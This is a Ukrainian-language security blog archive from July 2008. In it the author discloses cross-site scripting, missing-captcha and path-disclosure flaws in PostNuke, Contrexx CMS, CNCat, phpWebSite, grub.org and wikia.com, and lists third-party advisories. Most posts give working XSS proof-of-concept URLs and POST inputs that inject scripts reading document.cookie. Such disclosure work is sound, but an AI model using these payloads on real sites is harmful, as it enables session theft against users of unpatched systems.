Архів для категорії 'Уразливості'

Уразливості в PostNuke

23:52 19.07.2008

Сьогодні я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі PostNuke. Дірки я виявив на сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Insufficient Anti-automation:

Уразливість в user.php (в модулі NS-NewUser).

http://site/user.php?uname=test&email=test@test.com&vemail=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уразливості в user.php (в модулі NS-NewUser) в параметрах uname та email.

http://site/user.php?uname=%22%20style=%22xss:expression(alert(document.cookie))&module=NS-NewUser&op=confirmnewuser

http://site/user.php?email=%3Cscript%3Ealert(document.cookie)%3C/script%3E&vemail=&module=NS-NewUser&op=confirmnewuser

Уразлива версія PostNuke 0.7.1 та попередні версії (та потенційно наступні версії).

Уразливості на www.wikia.com

20:32 19.07.2008

29.02.2008

У липні, 31.07.2007, я знайшов Cross-Site Scripting уразливість на сайті http://www.wikia.com, а 01.02.2008 - Cross-Site Scripting уразливість вже в самій Wikia Search (яка співпрацює з проектом grub.org). Про що найближчим часом сповіщу адміністрацію пошукової системи.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.07.2008

XSS:

http://www.wikia.com

http://re.search.wikia.com

Дані уразливості вже виправлені.

Добірка уразливостей

18:16 18.07.2008

В даній добірці уразливості в веб додатках:

  • KF Web Server 3.1.0 admin console XSS (деталі)
  • SQL Injection In Script VBZooM V1.12 (деталі)
  • WheatBlog 1.1 RFI/SQL Injection (деталі)
  • AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights (деталі)
  • AV Arcade 2.1b (view_page.php) Remote SQL Injection (деталі)
  • PHPDirector <= 0.21 (SQL injection/Upload SHELL) Remote Vulnerabilities (деталі)
  • eTicket v.1.5.1.1 Multiple Cross-Site Scripting (деталі)
  • Gentili, akocomment SQL INJECTION (all version) (деталі)
  • Yoggie Pico Pro Remote Code Execution (деталі)
  • Міжсайтовий скриптінг в Drupal Project Module (деталі)

Уразливості в Contrexx CMS

20:25 17.07.2008

20.06.2008

У жовтні, 30.10.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в системі Contrexx CMS. Як раз коли виявив уразливості на www.astalavista.com, де і використовується цей движок.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

17.07.2008

XSS:

http://site/index.php?section=search&term=%22%20style=%22xss:expression(alert(document.cookie)) (IE)

Insufficient Anti-automation:

На сторінці реєстрації (http://site/index.php?section=community &cmd=register) немає захисту від автоматизованих запитів (капчі).

Уразлива Contrexx CMS 2.0 та попередні версії.

Добірка уразливостей

18:04 16.07.2008

В даній добірці уразливості в веб додатках:

  • QuickTicket multiple sql inj. (деталі)
  • XEForum Cookie Modification Privilege Escalation Vulnerability (деталі)
  • eTicket version 1.5.5 XSS Attack Vulnerability (деталі)
  • eTicket version 1.5.5 Path Disclosure Vulnerability (деталі)
  • DirectAdmin XSS vuln. (деталі)
  • Переповнення буфера в NewsBin Pro (деталі)
  • Information leakage in Scriptsez.net E-Dating System (деталі)
  • Vulnerability in Kamgaing Email System (kmail) (деталі)
  • Directory traversal vulnerability in TinyPHPforum (деталі)
  • Обхід авторизації в IBM DB2 (деталі)

Уразливості в CNCat

23:58 15.07.2008

Ще в 2006 році (одну 16.04.2006, а ще дві 03.08.2006) я знайшов Cross-Site Scripting уразливості в CNCat (каталог лінок). Дірки я виявив на сайті свого друга (і оперативно сповістив його). Також про дані XSS я розповідав, коли писав про уразливості на www.catalog-security.com.ua.

Враховуючи, що уразливості (першу з них) я знайшов ще коли в мене не було даного сайта, в часи коли я почав активно займатися веб безпекою, тому дана інформація в мене дещо відклалася. Про уразливості я найближчим часом повідомлю розробникам системи.

XSS:

Уразливості в add.php (можна як через GET, так і через POST), search.php та index.php.

http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія CNCat 2.0 та попередні версії.

Як я сьогодні перевірив, CNCat 2.1 також уразливий - в index.php та для POST запиту в add.php.

XSS:

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

POST запит на сторінці http://site/add.php
</textarea><script>alert(document.cookie)</script>В полі Описание.

CNCat 4.1 також уразливий ;-) , як я сьогодні перевірив (але в ньому інша уразливість). Про що я напишу окремо.

Уразливість на customize.org

20:36 15.07.2008

01.03.2008

У липні, 28.07.2007, я знайшов Cross-Site Scripting уразливість на проекті http://customize.org. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

15.07.2008

XSS:

Дана уразливість досі не виправлена.

Уразливості в phpWebSite

23:51 12.07.2008

Сьогодні я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі phpWebSite. Дірки я виявив на її офіційному сайті http://phpwebsite.appstate.edu. Про що найближчим часом повідомлю розробникам системи.

Insufficient Anti-Automation:

На сторінці реєстрації (http://site/index.php?module=users &action=user&command=signup_user) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://site/index.php?module=users &action=user&command=signup_user

"><BODY onload=alert(document.cookie)>В полях: Password і Confirm (разом), Email Address.

XSS через GET:

Уразлива версія phpWebSite 1.5.2 та попередні версії.

Добірка уразливостей

16:28 12.07.2008

В даній добірці уразливості в веб додатках:

Уразливості на grub.org

20:45 11.07.2008

27.02.2008

У липні, 31.07.2007, я знайшов Cross-Site Scripting та Full path disclosure уразливості на проекті http://grub.org (з яким співпрацює Wikia). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

11.07.2008

XSS:

XSS:

POST запит на сторінці http://grub.org/html/users.php?op=lookup
<script>alert(document.cookie)</script>В полі Username.

Full path disclosure:

http://www.grub.org/services/urlstats.php (POST запит)

http://www.grub.org/services/clientstats.php (POST запит)

Дані уразливості вже виправлені (і сайт був повністю перероблений).